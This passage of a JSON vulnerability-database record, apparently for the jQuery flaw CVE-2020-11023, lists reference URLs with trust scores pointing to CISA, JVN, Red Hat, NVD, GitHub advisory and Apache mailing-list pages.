"url": "https://github.com/github/advisory-database/blob/99afa6fdeaf5d1d23e1021ff915a5e5dbc82c1f1/advisories/github-reviewed/2020/04/ghsa-jpcq-cgw6-v4j6/ghsa-jpcq-cgw6-v4j6.json#l20-l37"
},
{
"trust": 0.9,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-055-02"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu99394498/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu94912830/"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu94847990/index.html"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu99891704/index.html"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-306-01"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-097-01"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-203-05"
},
{
"trust": 0.8,
"url": "https://cert.vde.com/en/advisories/vde-2021-027/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-11023"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.4,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-11022"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11358"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11358"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14042"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14040"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-40150"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-40149"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-45047"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-46364"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-42004"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-45693"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-42003"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-14042"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-14040"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3143"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2015-9251"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14041"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40150"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-10735"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18214"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40152"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40149"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10735"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40152"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-9251"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-14041"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-8331"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2017-18214"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8331"
},
{
"trust": 0.2,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3143"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-8203"
},
{
"trust": 0.2,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14040"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-9283"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r9006ad2abf81d02a0ef2126bab5177987e59095b7194a487c4ea247c@%3ccommits.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r07ab379471fb15644bf7a92e4a98cbc7df3cf4e736abae0cc7625fe6@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r3702ede0ff83a29ba3eb418f6f11c473d6e3736baba981a8dbd9c9ef@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rf0f8939596081d84be1ae6a91d6248b96a02d8388898c372ac807817@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r9e0bd31b7da9e7403478d22652b8760c946861f8ebd7bd750844898e@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r2c85121a47442036c7f8353a3724aa04f8ecdfda1819d311ba4f5330@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r4dba67be3239b34861f1b9cfdf9dfb3a90272585dcce374112ed6e16@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r55f5e066cc7301e3630ce90bbbf8d28c82212ae1f2d4871012141494@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3cdev.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rab82dd040f302018c85bd07d33f5604113573514895ada523c3401d9@%3ccommits.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rf661a90a15da8da5922ba6127b3f5f8194d4ebec8855d60a0dd13248@%3cdev.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra3c9219fcb0b289e18e9ec5a5ebeaa5c17d6b79a201667675af6721c@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra374bb0299b4aa3e04edde01ebc03ed6f90cf614dad40dd428ce8f72@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rb25c3bc7418ae75cba07988dafe1b6912f76a9dd7d94757878320d61@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rf1ba79e564fe7efc56aef7c986106f1cf67a3427d08e997e088e7a93@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra32c7103ded9041c7c1cb8c12c8d125a6b2f3f3270e2937ef8417fac@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r1fed19c860a0d470f2a3eded12795772c8651ff583ef951ddac4918c@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r094f435595582f6b5b24b66fedf80543aa8b1d57a3688fbcc21f06ec@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r9c5fda81e4bca8daee305b4c03283dddb383ab8428a151d4cb0b3b15@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r6e97b37963926f6059ecc1e417721608723a807a76af41d4e9dbed49@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rb69b7d8217c1a6a2100247a5d06ce610836b31e3f5d73fc113ded8e7@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rd38b4185a797b324c8dd940d9213cf99fcdc2dbf1fc5a63ba7dee8c9@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/radcb2aa874a79647789f3563fcbbceaf1045a029ee8806b59812a8ea@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r4aadb98086ca72ed75391f54167522d91489a0d0ae25b12baa8fc7c5@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra406b3adfcffcb5ce8707013bdb7c35e3ffc2776a8a99022f15274c6@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r0593393ca1e97b1e7e098fe69d414d6bd0a467148e9138d07e86ebbb@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r6c4df3b33e625a44471009a172dabe6865faec8d8f21cac2303463b1@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679@%3ccommits.nifi.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://github.com/cybernegro/cve-2020-11023"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4142"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-38750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1471"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1438"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3916"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25857"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-46175"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-35065"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-0091"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2764"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2764"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4137"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-46363"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1471"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-0264"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-38751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1274"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-37603"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-38749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-31129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-35065"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1043"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1438"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25857"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24785"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1274"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0554"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0553"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8768"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20852"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8535"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10743"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-15718"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20657"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19126"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1712"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8518"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12448"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8611"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-6251"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8676"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-1549"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-9251"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17451"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20060"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-19519"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11070"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-7150"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-1547"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-7664"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8607"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12052"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-5482"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14973"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8623"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15366"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8594"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8690"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20060"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13752"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8601"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3822"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-11324"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19925"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3823"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-7146"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-1010204"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7013"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11324"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11236"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8524"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-10739"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-18751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-16890"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-5481"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8536"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8686"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8671"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12447"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8544"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12049"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8571"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-19519"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2013-0169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8677"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-5436"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-18624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8595"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13753"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-11459"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12447"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8679"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20657"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-5094"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-6454"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20852"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12450"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20483"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14336"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4298"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8622"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-1010180"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7598"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8681"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3825"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8523"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-18074"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-0169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-6237"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-6706"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20483"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20337"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8673"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8559"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8687"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13822"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.6/updating/updating-cluster"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19923"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16769"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8672"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14822"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14404"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8608"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7662"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8615"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12449"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-7665"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8666"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8457"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-5953"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8689"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-15847"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-14498"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8735"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-11236"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19924"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8586"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12245"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-14404"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8726"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-1010204"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8596"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8696"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8610"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18408"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13636"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-1563"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16890"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-11070"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14498"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-7149"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16056"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10739"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20337"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-18074"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11110"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8584"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19959"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8675"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8563"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10531"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13232"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3843"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-1010180"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12449"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10715"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8609"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8587"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-18751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8506"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-18624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8583"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-9251"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12448"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11008"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11459"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8597"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14040"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9283"
},
{
"trust": 0.1,
